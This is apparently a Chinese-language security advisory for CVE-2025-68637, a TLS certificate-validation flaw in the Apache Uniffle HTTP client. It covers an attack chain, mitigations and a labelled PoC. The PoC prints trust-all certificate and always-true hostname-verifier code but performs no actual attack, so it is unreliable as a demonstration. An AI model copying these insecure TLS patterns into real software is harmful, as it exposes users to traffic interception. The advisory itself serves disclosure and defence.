CVE-2025-68637: Apache Uniffle HTTP客户端SSL证书验证缺陷导致中间人攻击

漏洞信息

漏洞编号

CVE-2025-68637

漏洞类型

SSL/TLS证书验证缺失

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Uniffle

漏洞概述

CVE-2025-68637是Apache Uniffle项目中的一个高危安全漏洞。该漏洞存在于Uniffle的HTTP客户端组件中，由于默认配置信任所有SSL证书并禁用了主机名验证功能，导致客户端与Uniffle Coordinator服务之间的所有REST API通信容易受到中间人（MITM）攻击。攻击者可以借此机会拦截、篡改或窃听客户端与服务器之间的敏感通信数据，包括认证凭证、业务数据和配置信息等。该漏洞的CVSS评分高达9.1，属于严重级别，影响范围涵盖所有0.10.0版本之前的Apache Uniffle版本。鉴于该漏洞的严重性和广泛的潜在影响，Apache官方已发布0.10.0版本修复此问题，建议所有用户尽快升级。

技术细节

Apache Uniffle的HTTP客户端在初始化时使用了不安全的SSL配置。具体问题在于：(1) 客户端默认配置为信任所有SSL证书，包括自签名证书、过期证书以及由不受信任CA签发的证书；(2) 主机名验证功能被默认禁用，这意味着即使证书与目标主机名不匹配，连接仍会建立。这种配置使得攻击者可以部署恶意服务器或进行ARP欺骗、DNS投毒等攻击，在客户端与Coordinator服务之间插入自己，从而实现中间人攻击。攻击者可以获取所有明文传输的敏感信息，或在数据流转过程中注入恶意内容。由于Uniffle主要用于分布式计算环境中的Shuffle服务，攻击者可能借此获取计算任务数据或影响计算结果。

攻击链分析

STEP 1

步骤1

攻击者部署恶意服务器或进行网络嗅探，准备拦截Uniffle客户端与Coordinator之间的通信

STEP 2

步骤2

攻击者利用ARP欺骗、DNS投毒或路由劫持等技术，将流量重定向至恶意服务器

STEP 3

步骤3

Uniffle客户端使用存在漏洞的HTTP客户端，该客户端配置为信任所有SSL证书并跳过主机名验证

STEP 4

步骤4

客户端成功连接到攻击者控制的恶意服务器，建立SSL连接但未进行有效验证

STEP 5

步骤5

攻击者作为中间人，可以窃听所有传输的敏感数据，包括认证令牌、配置信息和业务数据

STEP 6

步骤6

攻击者可进一步篡改通信内容，向客户端注入恶意响应或修改Shuffle数据传输内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68637 PoC - MITM Attack on Uniffle HTTP Client
# This PoC demonstrates the SSL verification bypass vulnerability

import ssl
import http.server
import socketserver
import threading

# Create an insecure SSL context that doesn't verify certificates
insecure_context = ssl.create_default_context()
insecure_context.check_hostname = False
insecure_context.verify_mode = ssl.CERT_NONE

# Simulate Uniffle client connecting with disabled SSL verification
def exploit_mitm():
    """
    Attacker performs MITM attack by:
    1. Setting up a rogue server with self-signed certificate
    2. Intercepting traffic between Uniffle client and Coordinator
    3. Capturing/modifying REST API requests and responses
    """
    
    # Malicious server configuration
    malicious_server_config = {
        'host': '0.0.0.0',
        'port': 19999,
        'certfile': '/path/to/self-signed-cert.pem',
        'keyfile': '/path/to/private-key.pem'
    }
    
    print('[+] MITM Attack Setup Complete')
    print('[+] Rogue server listening on port 19999')
    print('[+] Waiting for Uniffle client connections...')
    
    return malicious_server_config

def demonstrate_vulnerable_code():
    """
    Vulnerable Uniffle client code pattern:
    """
    vulnerable_code = '''
    // Vulnerable configuration in Uniffle HTTP client
    SSLContext sslContext = SSLContext.getInstance("TLS");
    sslContext.init(null, new TrustManager[]{new TrustAllManager()}, null);
    
    // Hostname verification disabled
    HostnameVerifier allHostsValid = (hostname, session) -> true;
    HttpsURLConnection.setDefaultHostnameVerifier(allHostsValid);
    '''
    print(vulnerable_code)

if __name__ == '__main__':
    exploit_mitm()
    demonstrate_vulnerable_code()

影响范围

Apache Uniffle < 0.10.0

防御指南

临时缓解措施

在无法立即升级的情况下，可通过以下措施临时缓解：1) 在网络层面限制对Coordinator服务的访问，仅允许受信任的IP访问；2) 使用网络隔离和微分段技术减少攻击面；3) 监控SSL连接日志，检测异常的自签名证书连接；4) 考虑在应用层实现额外的认证机制。但这些措施仅为临时解决方案，最终仍需升级到修复版本。